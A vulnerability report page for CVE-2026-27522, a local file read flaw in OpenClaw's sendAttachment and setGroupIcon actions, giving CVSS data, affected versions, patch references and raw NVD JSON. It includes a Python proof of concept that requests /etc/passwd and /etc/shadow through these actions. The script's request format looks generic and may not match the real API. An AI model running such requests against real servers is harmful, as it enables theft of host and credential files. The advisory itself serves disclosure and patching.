Security Vulnerability Report
CVE-2026-27522 CVSS 6.5 MEDIUM

Published: 2026-03-18 02:16:23
Last Modified: 2026-03-18 20:05:50

Description

OpenClaw versions prior to 2026.2.24 contain a local media root bypass vulnerability in sendAttachment and setGroupIcon message actions when sandboxRoot is unset. Attackers can hydrate media from local absolute paths to read arbitrary host files accessible by the runtime user.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.2.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-27522 PoC - OpenClaw Local File Read via media root bypass
# Target: OpenClaw < 2026.2.24

TARGET_URL = "http://target-server:8080/api"
ATTACKER_TOKEN = "low_privilege_user_token"


def exploit_file_read(file_path):
    """
    Exploit sendAttachment action to read local files
    file_path: Absolute path to read (e.g., /etc/passwd, C:\\Windows\\win.ini)
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    # Method 1: sendAttachment action
    payload = {
        "action": "sendAttachment",
        "chat_id": "victim_chat",
        "file_path": file_path,  # e.g., "file:///etc/passwd"
        "filename": "malicious_file"
    }
    response = requests.post(TARGET_URL, json=payload, headers=headers)
    return response.text


def exploit_setgroupicon(file_path):
    """
    Exploit setGroupIcon action to read local files
    file_path: Absolute path to read
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    payload = {
        "action": "setGroupIcon",
        "group_id": "target_group",
        "icon_path": file_path  # e.g., "file:///etc/shadow"
    }
    response = requests.post(TARGET_URL, json=payload, headers=headers)
    return response.text


# Example usage
if __name__ == "__main__":
    # Read /etc/passwd on Linux
    print("[*] Attempting to read /etc/passwd...")
    result = exploit_file_read("file:///etc/passwd")
    print(result)
    # Read shadow file (if permissions allow)
    print("[*] Attempting to read /etc/shadow...")
    result = exploit_file_read("file:///etc/shadow")
    print(result)
```

References

https://github.com/openclaw/openclaw/commit/270ab03e379f9653e15f7033c9830399b66b7e51 (Patch)
https://github.com/openclaw/openclaw/security/advisories/GHSA-fqcm-97m6-w7rm (Patch, Vendor Advisory)
https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-sendattachment-and-setgroupicon-message-actions (Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-27522",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-18T02:16:23.220",
    "lastModified": "2026-03-18T20:05:50.113",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenClaw versions prior to 2026.2.24 contain a local media root bypass vulnerability in sendAttachment and setGroupIcon message actions when sandboxRoot is unset. Attackers can hydrate media from local absolute paths to read arbitrary host files accessible by the runtime user."
      },
      {
        "lang": "es",
        "value": "Las versiones de OpenClaw anteriores a 2026.2.24 contienen una vulnerabilidad de omisión de la raíz de medios local en las acciones de mensaje sendAttachment y setGroupIcon cuando sandboxRoot no está configurado. Los atacantes pueden hidratar medios desde rutas absolutas locales para leer archivos de host arbitrarios accesibles por el usuario en tiempo de ejecución."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-22"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "2026.2.24",
                "matchCriteriaId": "673E4DE2-44C4-485D-8BDF-6DEEB32C1A98"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/openclaw/openclaw/commit/270ab03e379f9653e15f7033c9830399b66b7e51",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fqcm-97m6-w7rm",
        "source": "[email protected]",
        "tags": ["Patch", "Vendor Advisory"]
      },
      {
        "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-sendattachment-and-setgroupicon-message-actions",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}
```